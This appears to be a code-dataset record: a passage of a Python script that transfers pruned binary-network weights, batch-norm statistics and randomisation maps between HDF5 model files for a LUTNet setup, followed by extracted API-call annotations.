pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # bn 1 bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 2 bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 3 bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 4 bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 5 bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) pretrained.close()
[ "numpy.tile", "numpy.random.shuffle", "numpy.reshape", "numpy.ones", "numpy.logical_and", "numpy.logical_not", "numpy.logical_or", "h5py.File", "numpy.argsort", "numpy.array", "shutil.copyfile", "numpy.zeros", "numpy.shape", "numpy.arange", "numpy.set_printoptions" ]
[((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\n', (50, 68), True, 'import numpy as np\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['"""dummy_lutnet.h5"""', '"""pretrained_bin.h5"""'], {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')\n", (107, 147), False, 'from shutil import copyfile\n'), ((211, 247), 'h5py.File', 'h5py.File', (['"""baseline_pruned.h5"""', '"""r"""'], {}), "('baseline_pruned.h5', 'r')\n", (220, 247), False, 'import h5py\n'), ((297, 333), 'h5py.File', 'h5py.File', (['"""pretrained_bin.h5"""', '"""r+"""'], {}), "('pretrained_bin.h5', 'r+')\n", (306, 333), False, 'import h5py\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (957, 964), True, 'import numpy as np\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (988, 998), True, 'import numpy as np\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1032, 1049), True, 'import numpy as np\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (5522, 5529), True, 'import numpy as np\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (5551, 5560), True, 'import numpy as np\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (5581, 5593), True, 'import numpy as np\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5612, 5624), True, 'import numpy as np\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5722, 5729), True, 'import numpy as np\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5746, 5753), True, 'import numpy as np\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5777, 5792), True, 'import numpy as np\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (5810, 5822), True, 'import numpy as np\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5845, 5860), True, 'import numpy as np\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (5878, 5890), True, 'import numpy as np\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5913, 5928), True, 'import numpy as np\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (5946, 5958), True, 'import numpy as np\n'), ((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (6040, 6066), True, 'import numpy as np\n'), ((6169, 6218), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (6182, 6218), True, 'import numpy as np\n'), ((6231, 6264), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (6241, 6264), True, 'import numpy as np\n'), ((6327, 6381), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (6334, 6381), True, 'import numpy as np\n'), ((6399, 6453), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (6406, 6453), True, 'import numpy as np\n'), ((6471, 6525), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (6478, 6525), True, 'import numpy as np\n'), ((7198, 7236), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (7208, 7236), True, 'import numpy as np\n'), ((8681, 8699), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (8689, 8699), True, 'import numpy as np\n'), ((8718, 8736), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (8726, 8736), True, 'import numpy as np\n'), ((8762, 8787), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (8770, 8787), True, 'import numpy as np\n'), ((13604, 13619), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (13612, 13619), True, 'import numpy as np\n'), ((13633, 13650), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (13641, 13650), True, 'import numpy as np\n'), ((13663, 13683), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (13671, 13683), True, 'import numpy as np\n'), ((13695, 13714), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13702, 13714), True, 'import numpy as np\n'), ((13804, 13819), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13812, 13819), True, 'import numpy as np\n'), ((13828, 13843), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13836, 13843), True, 'import numpy as np\n'), ((13858, 13882), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13867, 13882), True, 'import numpy as np\n'), ((13883, 13912), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (13900, 13912), True, 'import numpy as np\n'), ((13926, 13950), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13935, 13950), True, 'import numpy as np\n'), ((13951, 13980), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (13968, 13980), True, 'import numpy as np\n'), ((13994, 14018), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (14003, 14018), True, 'import numpy as np\n'), ((14019, 14048), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (14036, 14048), True, 'import numpy as np\n'), ((14116, 14156), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (14130, 14156), True, 'import numpy as np\n'), ((14259, 14308), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (14272, 14308), True, 'import numpy as np\n'), ((14321, 14354), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (14331, 14354), True, 'import numpy as np\n'), ((14417, 14471), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (14424, 14471), True, 'import numpy as np\n'), ((14489, 14543), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (14496, 14543), True, 'import numpy as np\n'), ((14561, 14615), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (14568, 14615), True, 'import numpy as np\n'), ((15288, 15326), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (15298, 15326), True, 'import numpy as np\n'), ((16771, 16789), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (16779, 16789), True, 'import numpy as np\n'), ((16808, 16826), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (16816, 16826), True, 'import numpy as np\n'), ((16852, 16877), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (16860, 16877), True, 'import numpy as np\n'), ((21694, 21709), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (21702, 21709), True, 'import numpy as np\n'), ((21723, 21740), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (21731, 21740), True, 'import numpy as np\n'), ((21753, 21773), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (21761, 21773), True, 'import numpy as np\n'), ((21785, 21804), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21792, 21804), True, 'import numpy as np\n'), ((21894, 21909), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21902, 21909), True, 'import numpy as np\n'), ((21918, 21933), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21926, 21933), True, 'import numpy as np\n'), ((21948, 21972), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (21957, 21972), True, 'import numpy as np\n'), ((21973, 22002), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (21990, 22002), True, 'import numpy as np\n'), ((22016, 22040), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22025, 22040), True, 'import numpy as np\n'), ((22041, 22070), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (22058, 22070), True, 'import numpy as np\n'), ((22084, 22108), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22093, 22108), True, 'import numpy as np\n'), ((22109, 22138), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (22126, 22138), True, 'import numpy as np\n'), ((22206, 22246), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (22220, 22246), True, 'import numpy as np\n'), ((22349, 22398), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (22362, 22398), True, 'import numpy as np\n'), ((22411, 22444), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (22421, 22444), True, 'import numpy as np\n'), ((22507, 22561), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (22514, 22561), True, 'import numpy as np\n'), ((22579, 22633), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (22586, 22633), True, 'import numpy as np\n'), ((22651, 22705), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (22658, 22705), True, 'import numpy as np\n'), ((23378, 23416), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (23388, 23416), True, 'import numpy as np\n'), ((24861, 24879), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (24869, 24879), True, 'import numpy as np\n'), ((24898, 24916), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (24906, 24916), True, 'import numpy as np\n'), ((24942, 24967), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (24950, 24967), True, 'import numpy as np\n'), ((29784, 29799), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (29792, 29799), True, 'import numpy as np\n'), ((29813, 29830), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (29821, 29830), True, 'import numpy as np\n'), ((29843, 29863), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (29851, 29863), True, 'import numpy as np\n'), ((29875, 29894), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29882, 29894), True, 'import numpy as np\n'), ((29984, 29999), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (29992, 29999), True, 'import numpy as np\n'), ((30008, 30023), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (30016, 30023), True, 'import numpy as np\n'), ((30038, 30062), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30047, 30062), True, 'import numpy as np\n'), ((30063, 30092), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (30080, 30092), True, 'import numpy as np\n'), ((30106, 30130), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30115, 30130), True, 'import numpy as np\n'), ((30131, 30160), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (30148, 30160), True, 'import numpy as np\n'), ((30174, 30198), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30183, 30198), True, 'import numpy as np\n'), ((30199, 30228), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (30216, 30228), True, 'import numpy as np\n'), ((30296, 30336), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (30310, 30336), True, 'import numpy as np\n'), ((30439, 30488), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (30452, 30488), True, 'import numpy as np\n'), ((30501, 30534), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (30511, 30534), True, 'import numpy as np\n'), ((30597, 30651), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (30604, 30651), True, 'import numpy as np\n'), ((30669, 30723), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (30676, 30723), True, 'import numpy as np\n'), ((30741, 30795), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (30748, 30795), True, 'import numpy as np\n'), ((31468, 31506), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (31478, 31506), True, 'import numpy as np\n'), ((32951, 32969), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (32959, 32969), True, 'import numpy as np\n'), ((32988, 33006), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (32996, 33006), True, 'import numpy as np\n'), ((33032, 33057), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (33040, 33057), True, 'import numpy as np\n'), ((34347, 34364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (34355, 34364), True, 'import numpy as np\n'), ((34380, 34398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (34388, 34398), True, 'import numpy as np\n'), ((34420, 34444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (34428, 34444), True, 'import numpy as np\n'), ((34470, 34498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (34478, 34498), True, 'import numpy as np\n'), ((35347, 35364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (35355, 35364), True, 'import numpy as np\n'), ((35380, 35398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (35388, 35398), True, 'import numpy as np\n'), ((35420, 35444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (35428, 35444), True, 'import numpy as np\n'), ((35470, 35498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (35478, 35498), True, 'import numpy as np\n'), ((36347, 36364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (36355, 36364), True, 'import numpy as np\n'), ((36380, 36398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (36388, 36398), True, 'import numpy as np\n'), ((36420, 36444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (36428, 36444), True, 'import numpy as np\n'), ((36470, 36498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (36478, 36498), True, 'import numpy as np\n'), ((37347, 37364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (37355, 37364), True, 'import numpy as np\n'), ((37380, 37398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (37388, 37398), True, 'import numpy as np\n'), ((37420, 37444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (37428, 37444), True, 'import numpy as np\n'), ((37470, 37498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (37478, 37498), True, 'import numpy as np\n'), ((38347, 38364), 'numpy.array', 'np.array', (['bl_beta'], {}), '(bl_beta)\n', (38355, 38364), True, 'import numpy as np\n'), ((38380, 38398), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (38388, 38398), True, 'import numpy as np\n'), ((38420, 38444), 'numpy.array', 'np.array', (['bl_moving_mean'], {}), '(bl_moving_mean)\n', (38428, 38444), True, 'import numpy as np\n'), ((38470, 38498), 'numpy.array', 'np.array', (['bl_moving_variance'], {}), '(bl_moving_variance)\n', (38478, 38498), True, 'import numpy as np\n'), ((5641, 5660), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5648, 5660), True, 'import numpy as np\n'), ((6090, 6129), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (6104, 6129), True, 'import numpy as np\n'), ((6130, 6152), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (6140, 6152), True, 'import numpy as np\n'), ((13731, 13750), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13738, 13750), True, 'import numpy as np\n'), ((14180, 14219), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (14194, 14219), True, 'import numpy as np\n'), ((14220, 14242), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (14230, 14242), True, 'import numpy as np\n'), ((21821, 21840), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21828, 21840), True, 'import numpy as np\n'), ((22270, 22309), 'numpy.logical_and', 'np.logical_and', (['pruning_mask', 'init_mask'], {}), '(pruning_mask, init_mask)\n', (22284, 22309), True, 'import numpy as np\n'), ((22310, 22332), 'numpy.argsort', 'np.argsort', (['rand_map_0'], {}), '(rand_map_0)\n', (22320, 22332), True, 'import numpy as np\n'), 